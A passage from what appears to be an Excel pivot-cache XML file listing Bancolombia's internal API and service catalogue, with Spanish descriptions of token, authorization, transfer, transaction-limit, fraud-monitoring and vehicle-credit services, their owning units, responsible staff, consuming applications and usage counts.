    <s v="BancolombiaPay_AW1435001 _x000d__x000a_ TestAPIConnectPDN"/>
    <m/>
    <m/>
    <n v="11"/>
    <n v="5"/>
    <n v="74"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-04-18T14:15:41"/>
    <s v="Third Party Authorization"/>
    <n v="111"/>
    <s v="Third Party Authorization - Information"/>
    <n v="100"/>
    <s v="third-party-authorization-information"/>
    <s v="El API permite consultar el detalle de las relaciones que tiene un cliente con el comercio y producto donde se detalla la autorización que tiene para poder tranzar con los comercios y productos registrados"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="BancolombiaPay_AW1435001 _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-12-06T21:59:15"/>
    <s v="Third Party Authorization"/>
    <n v="111"/>
    <s v="Third Party Authorization - Management"/>
    <n v="111"/>
    <s v="third-party-authorization-management"/>
    <s v="gestionar las autorizaciones que un cliente puede entregar a un tercero sobre los productos que tiene en banco"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="BancolombiaPay_AW1435001 _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <m/>
    <n v="44"/>
    <m/>
    <m/>
    <n v="24"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-09-08T16:32:14"/>
    <s v="Token"/>
    <n v="101"/>
    <s v="Token - Management"/>
    <n v="101"/>
    <s v="token-management"/>
    <s v="API que permite la gestión del token para clientes y no clientes, utilizado por cualquier aplicación que requiere hacer uso de una autenticación OTP mediante la generación de un token. Esta generación de un token puede ser enviado ví­a celular como un mensaje de texto o al correo electrónico permitiéndole el uso de una plantilla para el mensaje; para así­ autenticar el cliente."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GeneracionToken/V1.0"/>
    <s v="_x000a_PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ ConfirmacionOpCadena_NU0127001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ ConsumerOTP_AW0660 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ PreaprobadosSucursales_AW1299001"/>
    <n v="29020"/>
    <n v="35802"/>
    <n v="42135"/>
    <n v="42716"/>
    <n v="48721"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2017-10-12T19:40:10"/>
    <s v="Security"/>
    <n v="111"/>
    <s v="Token OTP - Token Validating"/>
    <n v="100"/>
    <s v="otp-interno-autenticacion"/>
    <s v="API para validar token OTP"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GeneracionToken/V1.0"/>
    <m/>
    <s v="CHATBOT _x000d__x000a_ Vinculación Digital _x000d__x000a_ Dummy _x000d__x000a_ Remitly APP1_RTY _x000d__x000a_ BC Portal de Contenido_AW1218001 _x000d__x000a_ TransferWise_TNW"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-08-14T16:40:11"/>
    <s v="Trade Finance"/>
    <n v="101"/>
    <s v="Trade Finance - Commission Rates"/>
    <n v="100"/>
    <s v="trade-finance--commission-rates"/>
    <s v="El API servicio Trade Finance  Commission Rates tiene como objetivo consultar una comisión en especí­fico. En este servicio se toman en cuenta todas las comisiones que se tienen en las Filiales del Exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="GestionComisionesFiliales/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW1185001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transaccion Token InvestBot"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Transaccion Token Investbot, permite generar un token de transacción para poder realizar transacciones (consulta de productos de un cliente o hacer transferencias) en valores desde InvestBot."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Servicios Valores_AW1273001"/>
    <s v="AW1187001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transacciones Medios De Pago"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Transacciones Medios de Pago permite ejecutar transacciones monetarias a través del Motor de Pagos de Medios de pago. Estas transacciones cuentan con reglas de negocio propias del proveedor (por ejemplo, la capacidad de acreditar tiene la opción de enviar una notificación adicional a las que se tienen por defecto con Alertas y Notificaciones para el pagador y el receptor del dinero), por lo cual se debe validar funcionalmente antes de solicitar su re-uso."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <s v="ECP_ISECP0001"/>
    <s v="AW1011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-03T15:16:56"/>
    <s v="Transactions Limit"/>
    <n v="100"/>
    <s v="Transactions Limit - Maximum Transaction Amounts"/>
    <n v="100"/>
    <s v="transactions-limit-maximum-transaction-amounts"/>
    <s v="API para la gestión de topes monetarios que tiene un cliente. Los topes indican la cantidad de dinero que puede debitar dicho cliente durante el dí­a o mes segíºn sea el caso. Las funcionalidades expuestas permiten:     - Actualizar el acumulado de las transacciones hechas por el cliente durante el dí­a para poder determinar hasta que momento puede debitarse de sus cuentas.   - Consultar el monto lí­mite establecido por el cliente desde la sucursal virtual personas o los montos establecidos por el banco.    -  Reversar las transacciones en caso de que se requiera.    - Validar las transacciones, con el fin de determinar si se puede o no realizar una transacción monetaria."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GestionDeTopesMontosClientes/V2.0"/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ BancolombiaPay_AW1435001"/>
    <m/>
    <m/>
    <n v="1"/>
    <m/>
    <n v="36"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-05-04T13:09:01"/>
    <s v="Transactions Limits"/>
    <n v="101"/>
    <s v="Transactions Limits - Transaction Limit Amount"/>
    <n v="101"/>
    <s v="transactions-limits-transaction-limit-amount"/>
    <s v="API para la gestión de topes monetarios que tiene un cliente. Los topes indican la cantidad de dinero que puede debitar dicho cliente durante el dí­a o mes segíºn sea el caso. Las funcionalidades expuestas permiten:     - Actualizar el acumulado de las transacciones hechas por el cliente durante el dí­a para poder determinar hasta que momento puede debitarse de sus cuentas.   - Consultar el monto lí­mite establecido por el cliente desde la sucursal virtual personas o los montos establecidos por el banco.    -  Reversar las transacciones en caso de que se requiera.    - Validar las transacciones, con el fin de determinar si se puede o no realizar una transacción monetaria."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="BancolombiaPay_AW1435001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="45"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-07-13T13:13:04"/>
    <s v="Transaction"/>
    <n v="203"/>
    <s v="Transaction-Transactional Monitoring"/>
    <n v="202"/>
    <s v="transaction-transactional-monitoring"/>
    <s v="La API 'Monitoreo Transaccional'? ofrece la capacidad de evaluar las transacciones permitiendo calificar el nivel de anomalí­a (en relación con su comportamiento habitual) en una transacción especí­fica aplicando sobre la misma los filtros o alertas definidos a nivel de Reglas (Institucionales y de Cuenta), Analizadores (de Actividad Sospechosa) y RTA (Analizadores en Tiempo Real) de motor heurí­stico y de aprendizaje automatizado; entregando conjuntamente una calificación de riesgo de la transacción y una alerta proveniente de las reglas que apliquen sobre las mismas. Adicionalmente, este servicio permite declinar la transacción en tiempo real y guardar el estado final de la misma. Esta API de evaluación se puede solicitar desde diferentes canales, no solo desde el canal de Internet, sino por ejemplo desde el canal móvil. Adicional, esta podrí­a monitorear cualquier transacción, pero debe ser validado con la Dirección de Gestión de Fraude."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <m/>
    <s v="EDPYME_AW1170"/>
    <n v="3143578"/>
    <n v="2956400"/>
    <n v="2865356"/>
    <n v="3160069"/>
    <n v="3697353"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-02-25T22:39:26"/>
    <s v="Transaction"/>
    <n v="301"/>
    <s v="Transaction-Transactional Monitoring"/>
    <n v="301"/>
    <s v="transaction-transactional-monitoring"/>
    <s v="La API 'Monitoreo Transaccional'? ofrece la capacidad de evaluar las transacciones permitiendo calificar el nivel de anomalí­a (en relación con su comportamiento habitual) en una transacción especí­fica aplicando sobre la misma los filtros o alertas definidos a nivel de Reglas (Institucionales y de Cuenta), Analizadores (de Actividad Sospechosa) y RTA (Analizadores en Tiempo Real) de motor heurí­stico y de aprendizaje automatizado; entregando conjuntamente una calificación de riesgo de la transacción y una alerta proveniente de las reglas que apliquen sobre las mismas. Adicionalmente, este servicio permite declinar la transacción en tiempo real y guardar el estado final de la misma. Esta API de evaluación se puede solicitar desde diferentes canales, no solo desde el canal de Internet, sino por ejemplo desde el canal móvil. Adicional, esta podrí­a monitorear cualquier transacción, pero debe ser validado con la Dirección de Gestión de Fraude."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <m/>
    <s v="EDPYME_AW1170 _x000d__x000a_ AW1333002_Transaction_Monitoreo _x000d__x000a_ AW1333002_Transaction_Monitoreo _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="3143578"/>
    <n v="2956400"/>
    <n v="2865356"/>
    <n v="3160069"/>
    <n v="3697353"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-09-09T01:01:22"/>
    <s v="Transaction"/>
    <n v="100"/>
    <s v="Transaction-Transactional Monitoring"/>
    <n v="100"/>
    <s v="transaction-transactional-monitoring"/>
    <s v="La API 'Monitoreo Transaccional'? ofrece la capacidad de evaluar las transacciones permitiendo calificar el nivel de anomalí­a (en relación con su comportamiento habitual) en una transacción especí­fica aplicando sobre la misma los filtros o alertas definidos a nivel de Reglas (Institucionales y de Cuenta), Analizadores (de Actividad Sospechosa) y RTA (Analizadores en Tiempo Real) de motor heurí­stico y de aprendizaje automatizado; entregando conjuntamente una calificación de riesgo de la transacción y una alerta proveniente de las reglas que apliquen sobre las mismas. Adicionalmente, este servicio permite declinar la transacción en tiempo real y guardar el estado final de la misma. Esta API de evaluación se puede solicitar desde diferentes canales, no solo desde el canal de Internet, sino por ejemplo desde el canal móvil. Adicional, esta podrí­a monitorear cualquier transacción, pero debe ser validado con la Dirección de Gestión de Fraude."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="3143578"/>
    <n v="2956400"/>
    <n v="2865356"/>
    <n v="3160069"/>
    <n v="3697353"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-03-22T15:52:28"/>
    <s v="Transaction"/>
    <n v="202"/>
    <s v="Transaction-Transactional Monitoring"/>
    <n v="201"/>
    <s v="transaction-transactional-monitoring"/>
    <s v="El API de monitoreo transaccional, permite realizar el rastreo a las transacciones que realiza un cliente en los diferentes canales banco. La prevención  a nivel de financiación es fundamental y un insumo de este rastreo es el comportamiento de nuestros clientes, por esto, por medio de la evaluación de su actividad sabemos si hay algo inusual por lo que debamos general alertas de riesgos, y a su vez poder almacenar la información del estado final de la misma.  La API 'Monitoreo Transaccional'? ofrece la capacidad de evaluar las transacciones permitiendo calificar el nivel de anomalí­a (en relación con su comportamiento habitual) en una transacción especí­fica, aplicando sobre la misma los filtros o alertas definidos a nivel de Reglas (Institucionales y de Cuenta), Analizadores (de Actividad Sospechosa) y RTA (Analizadores en Tiempo Real) de motor heurí­stico y de aprendizaje automatizado; entregando conjuntamente una calificación de riesgo de la transacción y una alerta proveniente de las reglas que apliquen sobre las mismas.  Adicionalmente, este servicio permite declinar la transacción en tiempo real y guardar el estado final de la misma."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="3143578"/>
    <n v="2956400"/>
    <n v="2865356"/>
    <n v="3160069"/>
    <n v="3697353"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transferencia Cuentas Deposito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Transferencia Cuentas Deposito tiene como objetivo realizar transferencia en línea entre cuentas depósitos (Cuenta Ahorro a Cuenta Ahorro y Cuenta Corriente y viceversa)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <m/>
    <s v="AW0638 _x000d__x000a_AW1269001 _x000d__x000a_AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transferencia Fondos Banco ABanca Digital"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio tiene como alcance realizar transferencia de fondos desde una cuenta Bancolombia a una cuenta de Banca Digital ( Nequi)"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Finacle (Banco Digital)_AW1011001"/>
    <s v="SVP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transferencias Cuentas Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio TransferenciasCuentasDepositos habilita las capacidades relacionadas con los movimientos monetarios entre cuentas como, por ejemplo: débitos, créditos, transferencias y la anulación de cada uno de estos movimientos según se requiera."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="AW0000852 _x000d__x000a_AW1373 _x000d__x000a_NU0010001 _x000d__x000a_AW1365 _x000d__x000a_AW0000125 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_NU0094001 _x000d__x000a_NU0166001 _x000d__x000a_AW0360006 _x000d__x000a_ISRDI001 _x000d__x000a_AW0955001 _x000d__x000a_AW1435001 _x000d__x000a_AW1300001 _x000d__x000a_AW1404002 _x000d__x000a_AW1277001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transferencias De Bolsillos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El Servicio TransferenciasDeBolsillos habilita las capacidades Monetarias sobre los bolsillos de una cuenta de ahorros como, por ejemplo, adicionar a un bolsillo, retirar de un bolsillo o transferir entre bolsillos."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0021001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transferencias De Fondos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Transferencias de fondos tiene como objetivo realizar transferencia en línea entre cuentas depósitos (Cuenta Ahorro a Cuenta Ahorro y Cuenta Corriente y viceversa) entre cuentas de la filial o cuentas externas."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW1276001 _x000d__x000a_APIC _x000d__x000a_AW1185001 _x000d__x000a_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transferencias Otros Bancos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Transferencias Otros Bancos permitirá gestionar las operaciones asociadas a otros bancos a traves del sistema ACH como lo son crear beneficiarios, enviar transferencias a otros bancos y anular transferencias a otros bancos."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transmision Contenido Documental"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio que permite realizar contribución o carga    de archivos directamente al Gestor Documental WCC del Banco"/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Oracle ECM_UCM - Universal Content Management_AW0494001"/>
    <s v="AW0659"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Trasferencias InvestBot"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Transferencias Investbot, permite hacer transferencias de dinero desde FIC (Fondos de Inversión Colectiva) valores, Cunetas multiproductos Valores y Cuentas de ahorros y corrientes hacia la cuenta de investbot."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Servicios Valores_AW1273001"/>
    <s v="AW1187001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-09-10T15:02:05"/>
    <s v="Trust"/>
    <n v="101"/>
    <s v="Trust - Trusts"/>
    <n v="101"/>
    <s v="trust-trusts"/>
    <s v="Esta API permite consultar la información de los fideicomisos de los clientes que tienen bienes administrados y gestionados por Fiduciaria Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Tesoreria"/>
    <s v="Tesoreria"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v=""/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Validacion Cuentas Nequi"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permitirá validar con el número de documento y tipo de documento si un cliente tiene cuenta vigente en Nequi."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Finacle (Banco Digital)_AW1011001"/>
    <s v="AW1176"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Validar Codigo Seguridad"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permitir que el usuario valide el código de seguridad que fue generado cuando solicitó la regeneración de la clave."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Validar Cuenta"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permitir consultar las cuentas tanto de ahorro, corriente y AFC de los clientes para validar, que dicha cuenta exista, que permita que se le apliquen Créditos (Desembolsos), que permita que se le realicen Débitos (Débito Automático), que no esté bloqueada, y que si es una cuenta AFC, de ahorros o corriente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <m/>
    <s v="Bankvision - BVC_Matriz MIT_ISBVC0009"/>
    <s v="AW0709001 _x000d__x000a_AW01010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-21T22:12:15"/>
    <s v="Vehicle Credit Study"/>
    <n v="104"/>
    <s v="Vehicle Credit - Final Study"/>
    <n v="104"/>
    <s v="vehicle-credit-final-study"/>
    <s v="El proceso de Estudio Final, permite el registro de la información de los datos adicionales del cliente, actividad económica, financieros para realizar la ejecución del estudio finalpara el crédito de véhiculo y obtener una aprobación, un rechazo o alguna alternativa adicional como mejorar la capacidad de pago o proceder a un proceso manual."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="Carventuri _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="5247"/>
    <n v="7617"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-06T02:02:55"/>
    <s v="Vehicle Credit Study"/>
    <n v="106"/>
    <s v="Vehicle Credit - Final Study"/>
    <n v="106"/>
    <s v="vehicle-credit-final-study"/>
    <s v="El proceso de Estudio Final, permite el registro de la información de los datos adicionales del cliente, actividad económica, financieros para realizar la ejecución del estudio finalpara el crédito de véhiculo y obtener una aprobación, un rechazo o alguna alternativa adicional como mejorar la capacidad de pago o proceder a un proceso manual."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_AAA _x000d__x000a_ CarventuriApiVehiculos_AW1097001 _x000d__x000a_ PuntoAliadoApiVehiculos_AW1097001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-21T22:12:15"/>
    <s v="Vehicle Credit Study"/>
    <n v="104"/>
    <s v="Vehicle Credit - Manual Study"/>
    <n v="104"/>
    <s v="vehicle-credit-manual-study"/>
    <s v="API publica que permite registrar la información adicional en que caso de requerirse un estudio manual para el crédito de vehiculo. Esta API se toma como una tercera familia de apis, con tres capacidades que se irán ejecutando secuencialmente. Una vez realizado este registro de datos para el estudio manual, se entrega una respuesta indicando que se realizará el estudio. Esta APIs esta especificada en el contexto funcional de SUFI-Vehiculos."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="Carventuri _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="4919"/>
    <n v="7610"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-06T02:02:55"/>
    <s v="Vehicle Credit Study"/>
    <n v="106"/>
    <s v="Vehicle Credit - Manual Study"/>
    <n v="106"/>
    <s v="vehicle-credit-manual-study"/>
    <s v="&lt;p&gt;La capacidad expuesta por Grupo Bancolombia tiene como objetivo la radicaci&amp;oacute;n de la informaci&amp;oacute;n necesaria para realizar el estudio de cr&amp;eacute;dito para v&amp;eacute;hiculo con los siguientes pasos del proceso:&lt;/p&gt; &lt;p&gt;Los pasos a seguir en este proceso son:&lt;br /&gt;   &lt;ol&gt;&lt;li&gt;La soluci&amp;oacute;n se debe autenticar en la plataforma de APIs de Bancolombia.&lt;/li&gt;&lt;li&gt;La soluci&amp;oacute;n debe presentar los formularios para la captura de la informaci&amp;oacute;n para la radicaci&amp;oacute;n de la solicitud del cr&amp;eacute;dito, con los datos del comercio si aplica, categorizaci&amp;oacute;n del producto, datos del producto.&lt;/li&gt;&lt;li&gt;Continua con el registro de informaci&amp;oacute;n Personal (realizando la precarga de datos si es cliente Bancolombia por medio de la API de Customers) y financiera, actividad econ&amp;oacute;mica.&lt;/li&gt;&lt;li&gt;Se realiza el env&amp;iacute;o de informaci&amp;oacute;n aceptando terminos y condiciones.&lt;/li&gt;&lt;li&gt;Se realizan la validaciones de Pre-Bureau, Bureau y Pos-Bureau.&lt;/li&gt;&lt;li&gt;Generaci&amp;oacute;n autom&amp;aacute;tica de una aprobaci&amp;oacute;n, rechazo o en su defecto env&amp;iacute;o a estudio manual.&lt;/li&gt; &lt;/ol&gt;"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_AAA _x000d__x000a_ CarventuriApiVehiculos_AW1097001 _x000d__x000a_ PuntoAliadoApiVehiculos_AW1097001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-11-21T22:12:15"/>
    <s v="Vehicle Credit Study"/>
    <n v="104"/>
    <s v="Vehicle Credit - Preliminary Study"/>
    <n v="104"/>
    <s v="vehicle-credit-preliminary-study"/>
